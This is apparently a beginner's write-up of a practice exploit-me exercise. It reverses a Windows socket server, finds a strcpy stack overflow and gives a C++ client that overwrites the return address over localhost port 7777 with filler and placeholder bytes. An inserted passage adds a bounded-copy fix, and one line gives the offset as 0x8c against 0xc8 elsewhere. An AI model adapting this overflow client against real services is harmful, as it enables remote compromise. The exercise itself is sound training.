My first vulnerability analysis, and quite exciting.
Since I had never done vulnerability analysis before and had only read a little about it, I wanted something to practise on. I turned to the pediy (Kanxue) exploit-me exercise; I expected it to be hard, but it turned out to be very basic and well suited to a novice like me.
http://bbs.pediy.com/showthread.php?t=56998
Getting to the point
First I took the Windows program and dragged it into IDA. The program logic was surprisingly simple: a very standard socket workflow with some error handling.
Detailed explanation below.
mov ebp, eax
test ebp, ebp
Clearly this is the error handling for the socket() call.
This is also error handling, checking whether accept() succeeded.
Here is the key part: the connection setup is finished, so the problem must be here.
Follow this call.
I found copying behaviour; pressing F5 shows that it is actually a strcpy.
Another interesting point: this function does not set up a stack frame, even though it really is entered by a call and not a jmp.
With no stack frame, it reserves the local stack space by adjusting ESP directly, so the return address sits right above that space.
So we can guess that 0xc8 is the size of the local variables, i.e. the distance from the buffer to the return address.
Next, debug with OllyDbg (OD).
Set a breakpoint on the RET and you get this.
Analysing the stack shows it really is the 0x8c size we guessed.
I wrote a simple socket client to send the shellcode.
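As an added illustration (not code from the original post or from the target program), here is the vulnerable handler pattern recovered above beside a bounded replacement, in portable C so it runs anywhere. The names handle_request_vulnerable, handle_request_checked and simulate_input, and the 0xc8 buffer size taken from the ESP adjustment on the page, are assumptions for this example; the target's real handler has no stack frame and the return address lies directly above the 0xc8 bytes of locals, which is exactly why an unbounded strcpy there reaches it.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Size of the local buffer inferred from the ESP adjustment on the page. */
#define LOCAL_BUF_SIZE 0xc8

/* Vulnerable pattern as recovered from the target (hypothetical rewrite in C):
   whatever was received is copied into a fixed 0xc8-byte stack buffer with
   strcpy. Any input of 0xc8 bytes or more runs past the buffer and, since the
   function builds no frame, straight over the saved return address. */
static int handle_request_vulnerable(const char *received)
{
    char local[LOCAL_BUF_SIZE];
    strcpy(local, received);          /* no length check: the bug */
    return (int)strlen(local);
}

/* Hardened handler (hypothetical replacement, not the target's code): refuse
   input that does not fit, then copy a bounded amount and terminate
   explicitly so the buffer is always a valid C string. Returns the number of
   bytes accepted, or -1 when the input was rejected. */
static int handle_request_checked(const char *received, size_t received_len)
{
    char local[LOCAL_BUF_SIZE];
    if (received_len >= sizeof local)  /* leave room for the terminator */
        return -1;                     /* reject instead of overflowing */
    memcpy(local, received, received_len);
    local[received_len] = '\0';
    return (int)received_len;
}

/* Feed the checked handler a constructed input of 'len' filler bytes, the
   same shape as the page's send buffer, so the boundary can be exercised
   without ever corrupting a stack. Inputs longer than 511 are rejected. */
static int simulate_input(size_t len)
{
    char probe[512];
    if (len >= sizeof probe)
        return -1;
    memset(probe, 'a', len);           /* constructed filler, like the page's 'a's */
    probe[len] = '\0';
    return handle_request_checked(probe, len);
}

int main(void)
{
    /* 0xc7 bytes still fit; 0xc8 would clobber the terminator and the
       page's 0xc8 + 4 byte payload would clobber the return address. */
    printf("0xc7 bytes: %d\n", simulate_input(0xc7));
    printf("0xc8 bytes: %d\n", simulate_input(0xc8));
    printf("0xc8+4 bytes: %d\n", simulate_input(LOCAL_BUF_SIZE + 4));
    printf("short input through vulnerable path: %d\n",
           handle_request_vulnerable("hello"));
    return 0;
}
```

The checked variant is the fix a code reviewer would ask for: the length of the data returned by recv() is known, so the copy must be bounded by the destination size, and rejecting oversize input is safer than silently truncating a protocol message.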
// EXP.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "Ws2_32.lib")

// 200 bytes of filler (0xc8) followed by the 4 bytes that land on the return address
char shellcode[] =
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaa\xcc\xdd\xee\xff";

int main()
{
    SOCKET mysocket;
    WSADATA outdata;
    WSAStartup(MAKEWORD(2, 2), &outdata);
    mysocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in socketinfo;
    socketinfo.sin_family = AF_INET;
    socketinfo.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    socketinfo.sin_port = htons(7777); // port 7777 was obtained by analysing the target's bind() call

    if (connect(mysocket, (SOCKADDR *)&socketinfo, sizeof(socketinfo)) == SOCKET_ERROR)
    {
        MessageBoxW(NULL, L"Error", L"Error", 0);
    }
    // sizeof(shellcode) includes the terminating NUL, so 205 bytes are sent
    send(mysocket, shellcode, sizeof(shellcode), 0);

    closesocket(mysocket);
    WSACleanup();
    return 0;
}
The results are as follows.
The return address was successfully overwritten!
I should have written real shellcode, but I can't write it yet, so I'll add that later after studying it further.
That concludes the analysis: the vulnerability is a simple remote overflow caused by strcpy.
A simple analysis of remote Overflow vulnerability